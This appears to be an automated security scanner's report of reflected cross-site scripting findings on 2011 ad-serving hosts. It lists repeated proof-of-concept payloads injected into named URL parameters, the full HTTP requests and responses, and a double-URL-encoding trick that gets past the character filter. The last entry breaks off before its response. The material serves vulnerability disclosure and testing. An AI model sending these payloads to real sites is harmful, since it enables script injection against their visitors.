GET /adj/N5506.MSN/B5070033.106;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!4e018"-alert(1)-"0e1e7727ec4&&PID=8173801&UIT=G&TargetID=8308244&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=;ord=1932086037? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8012'-alert(1)-'4150aa4ae71 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849b8012'-alert(1)-'4150aa4ae71&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:00 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:00 GMT; path=/ Set-Cookie: i_1=33:1411:836:100:0:40771:1303843020:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:00 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 922
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849b8012'-alert(1)-'4150aa4ae71&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; }
The value of the 10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b897'-alert(1)-'1221f18c50f was submitted in the 10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!9b897'-alert(1)-'1221f18c50f&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:36:52 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:36:52 GMT; path=/ Set-Cookie: i_1=33:1411:992:100:0:40771:1303843012:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:36:52 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 910
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!9b897'-alert(1)-'1221f18c50f&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; ret ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54622'-alert(1)-'002a9baae46 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=176378880654622'-alert(1)-'002a9baae46&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:16 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:16 GMT; path=/ Set-Cookie: i_1=33:1411:790:100:0:40771:1303843036:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:16 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 914
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=176378880654622'-alert(1)-'002a9baae46&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image1411() { docum ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58bcb'-alert(1)-'b02bf13cdc7 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed7458bcb'-alert(1)-'b02bf13cdc7 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:28 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:28 GMT; path=/ Set-Cookie: i_1=33:1411:49:100:0:40771:1303843048:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:28 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 924
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed7458bcb'-alert(1)-'b02bf13cdc7'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image1411() { document.write('<a href="//ad.wsod.com/click/8bec9b10 ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0a79'-alert(1)-'9ef692e406f was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QDa0a79'-alert(1)-'9ef692e406f&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:24 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:24 GMT; path=/ Set-Cookie: i_1=33:1411:794:100:0:40771:1303843044:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:24 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 922
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QDa0a79'-alert(1)-'9ef692e406f&ASID=0899181fa77540cfa23c1407b60aed74'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image1411() { document.write( ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5140d'-alert(1)-'366f24d7955 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=82312085140d'-alert(1)-'366f24d7955&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:12 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:12 GMT; path=/ Set-Cookie: i_1=33:1411:794:100:0:40771:1303843032:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:12 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 922
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=82312085140d'-alert(1)-'366f24d7955&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image14 ...[SNIP]...
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc7e5'-alert(1)-'6ddd018aaa was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=Gdc7e5'-alert(1)-'6ddd018aaa&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:07 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:07 GMT; path=/ Set-Cookie: i_1=33:1411:972:100:0:40771:1303843027:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:07 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 913
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=Gdc7e5'-alert(1)-'6ddd018aaa&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } func ...[SNIP]...
5.53. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959** [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82f30'-alert(1)-'9293594230b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74&82f30'-alert(1)-'9293594230b=1 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:33 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:33 GMT; path=/ Set-Cookie: i_1=33:1411:972:100:0:40771:1303843053:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:33 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 917
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74&82f30'-alert(1)-'9293594230b=1'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image1411() { document.write('<a href="//ad.wsod.com/click/8bec9b ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49585"-alert(1)-"9386b35fba was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=847984949585"-alert(1)-"9386b35fba&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:36:59 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92046"-alert(1)-"146c89c17b4 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=176378880692046"-alert(1)-"146c89c17b4&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:12 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79074"-alert(1)-"90cbbf22942 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed7479074"-alert(1)-"90cbbf22942 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:21 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a40e7"-alert(1)-"cba368c8dc7 was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QDa40e7"-alert(1)-"cba368c8dc7&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:16 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 600fc%2522%253balert%25281%2529%252f%252ff3cc9aebd4f was submitted in the REST URL parameter 2. This input was echoed as 600fc";alert(1)//f3cc9aebd4f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357600fc%2522%253balert%25281%2529%252f%252ff3cc9aebd4f/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:28 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9bf5%2522%253balert%25281%2529%252f%252fb0a835980d5 was submitted in the REST URL parameter 3. This input was echoed as d9bf5";alert(1)//b0a835980d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60d9bf5%2522%253balert%25281%2529%252f%252fb0a835980d5/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
